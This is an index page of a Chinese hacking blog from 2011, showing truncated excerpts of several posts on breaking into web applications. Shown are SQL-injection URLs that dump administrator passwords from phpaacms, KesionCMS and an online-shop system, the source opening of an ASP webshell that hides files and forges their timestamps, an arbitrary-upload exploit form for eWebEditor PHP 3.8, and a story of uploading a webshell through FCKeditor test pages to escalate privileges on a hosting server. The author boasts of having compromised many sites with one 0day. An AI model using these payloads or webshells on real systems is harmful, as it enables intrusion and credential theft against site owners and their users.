网趣网上购物系统时尚版 V最新漏洞拿WEBSHELL

   
分类:安全 | 2011-08-3 | 撸过 2,268 次
0人扯蛋
西宁威势
今天周末,睡到中午才起床,刚上线,看到QQ好友辐射鱼给我留言,找我测试脚本漏洞。

辐射鱼 13:01:03
等我找个点.
辐射鱼 13:03:48
https://www.webshell.cc/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww)
辐射鱼 13:04:41
 表cnhww.为啥不支持 order by
辐射鱼 13:05:06
https://www.webshell.cc/price.asp?anid=62%20order%20by%201
辐射鱼 13:05:29
password/admin[......]

继续阅读

隐藏并修改文件的最后修改时间的asp-webshell

   
分类:安全 | 2011-08-2 | 撸过 894 次
0人扯蛋

作者:skyfire[B.H.S.T]

隐藏并修改文件的最后修改时间的asp-webshell

源码:

<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件
'     通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24  write by skyfire
response.write "<form method=post>"
response.write "路&nb[......]

继续阅读

ewebeditor PHP 3.8版本上传任意文件0day

   
分类:安全 | 2011-08-2 | 撸过 1,775 次
0人扯蛋

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似
听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。

EXP如下:

<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url valu[......]

继续阅读

一次星外虚拟主机的提权

   
分类:安全 | 2011-08-1 | 撸过 4,304 次
0人扯蛋

今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网

www.taoyuanbao.com

小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。

手工输入 fckeditor路径 …。存在…

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

直接上传一句话。aspx的站 … 直接上大马…看了下路径d:\freehost 星外的主机。

在土司找到星外提权“新思路”[......]

继续阅读

114啦网址导航留言本注入

   
分类:安全 | 2011-07-30 | 撸过 1,374 次
0人扯蛋

漏洞文件feedback/feedback.php

 
影响版本 <=1.5

 

$username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username'])); $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : ''; $content = (isset($_POST['content'])) ? tri[......]

继续阅读

phpaacms 4.0 Sql 注入0day漏洞及修复

   
分类:安全 | 2011-07-30 | 撸过 1,723 次
0人扯蛋

phpaacms是一套免费开源的简洁文章管理系统cms.

漏洞文件:search.php //变量$_GET['id']过滤不严造成的注射

测试EXP:

https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,phpaacms_users.password,0x27,0x7e)%20FROM%20`phpaa`.phpaacms_users%20LIMIT%2[......]

继续阅读

科汛CMS 6.X-7.06最新注入0day

   
分类:安全 | 2011-07-30 | 撸过 1,873 次
0人扯蛋

kesionCMS用的人非常多哦。经常也被暴洞。记得几年前藏着一个科汛的HTTP头注入

0day日了好多站,那时候多喜欢挂驴。搞了好多黄色图片站来挂。

这次暴的洞是T00LS的核心先发的。然后论坛一个社工牛给社了后研究出来的。

直接暴管理员帐号和密码的EXP:

https://www.webshell.cc/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C[......]

继续阅读